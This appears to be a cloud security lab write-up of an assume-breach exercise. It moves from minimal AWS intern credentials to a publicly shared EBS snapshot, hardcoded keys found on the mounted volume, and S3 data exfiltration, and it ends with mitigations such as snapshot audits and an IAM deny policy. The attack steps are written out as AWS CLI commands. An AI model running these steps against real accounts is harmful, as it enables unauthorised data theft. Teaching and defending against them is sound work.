Scenario
Huge Logistics hired me to simulate an “assume breach” scenario starting with intern-level AWS credentials. My challenge: uncover how far minimal access could go in their cloud environment. The stakes? Their client E-Corp’s disaster recovery plans and backup logistics hung in the balance.
Phase 1: Initial Reconnaissance
First, I established my identity using AWS CLI:
aws sts get-caller-identity
Output:
IAM User: intern
Account ID: 1045064**608
This confirmed my starting position: minimal privileges.

Next, I investigated attached policies:
aws iam list-attached-user-policies --user-name intern
Discovered policy: PublicSnapper
Examined policy permissions:
aws iam get-policy --policy-arn arn:aws:iam::104506445608:policy/PublicSnapper

Key permissions granted:
ec2:DescribeSnapshots(view all account snapshots)ec2:DescribeSnapshotAttribute(inspect permissions)
This was excessive for an intern – my first red flag.
Phase 2: Snapshot Discovery
Enumerated EBS snapshots:
aws ec2 describe-snapshots --owner-ids 104506445608 --region us-east-1

Discovered:
- Snapshot ID:
snap-0c0679098c7a4e636 - Size: 50 GB
- Unencrypted
Checked permissions:
aws ec2 describe-snapshot-attribute \
--attribute createVolumePermission \
--snapshot-id snap-0c0679098c7a4e636
Critical finding:
{
"CreateVolumePermissions": [
{ "Group": "all" }
]
}

“Group”: “all” meant ANY AWS user could clone this snapshot – a catastrophic misconfiguration.
Phase 3: Data Exfiltration
In my personal AWS account:
- Created volume from public snapshot (us-east-1a AZ)
- Launched Ubuntu EC2 instance (t2.micro, same AZ)
- Attached volume as
/dev/xvdf

Mounted the volume:
ssh -i key.pem ubuntu@<IP>
sudo mkdir /mnt/secret_volume
sudo mount /dev/xvdf1 /mnt/secret_volume
Discovered critical exposure:
cat /mnt/secret_volume/home/intern/practice_files/s3_download_file.php
Contained hardcoded credentials:
<?php
$aws_key = "AKIAJ...";
$aws_secret = "k7c3...";
$bucket = "ecorp-client-data";
?>

Phase 4: Full Compromise
Used stolen credentials:
aws configure set aws_access_key_id "AKIAJ..."
aws configure set aws_secret_access_key "k7c3..."
Accessed sensitive S3 bucket:
aws s3 ls s3://ecorp-client-data
Discovered files:
ecorp_dr_logistics.csvclient_backup_keys.txtfinancial_records.zip
Exfiltrated critical data:
aws s3 cp s3://ecorp-client-data/ecorp_dr_logistics.csv .

Huge Logistics had exposed their largest client through a single public snapshot.
Defense Analysis & Lessons Learned
Why this breach occurred:
- Public snapshot permissions:
"Group": "all"enabled cross-account access - Unencrypted data: No EBS encryption enabled
- Hardcoded secrets: Credentials in test files
- Overprivileged intern: Excessive DescribeSnapshots permission
Mitigation strategies:
# Weekly audit for public snapshots:
aws ec2 describe-snapshots \
--owner-id self \
--query "Snapshots[?CreateVolumePermissions[?Group=='all']]" \
--output table
Critical defenses implemented:
- Encrypt all EBS volumes with KMS keys
- Automate public snapshot detection with AWS Config rules
- Implement IAM policy guardrails:
{
"Effect": "Deny",
"Action": "ec2:ModifySnapshotAttribute",
"Resource": "*",
"Condition": {
"StringEquals": {
"ec2:Attribute": "createVolumePermission"
}
}
}
- Rotate credentials quarterly and after incidents
Conclusion
This breach demonstrated how third-party vulnerabilities (Huge Logistics) can compromise primary targets (E-Corp). Within 37 minutes, I progressed from intern credentials to full client data exfiltration by exploiting:
- A single public snapshot (
snap-0c0679098c7a4e636) - Hardcoded credentials in mounted volume
- Excessive IAM permissions
The exercise revealed 3 additional public snapshots in other regions – proving this was systemic, not isolated. As Ben Morris noted at DEFCON 27, these exposures impact Fortune 500 companies across tech, healthcare, and logistics sectors.
“Cloud security isn’t about guarding front doors – it’s about checking every window, drawer, and hidden key under the mat. One public snapshot is all it takes to unravel an ecosystem.”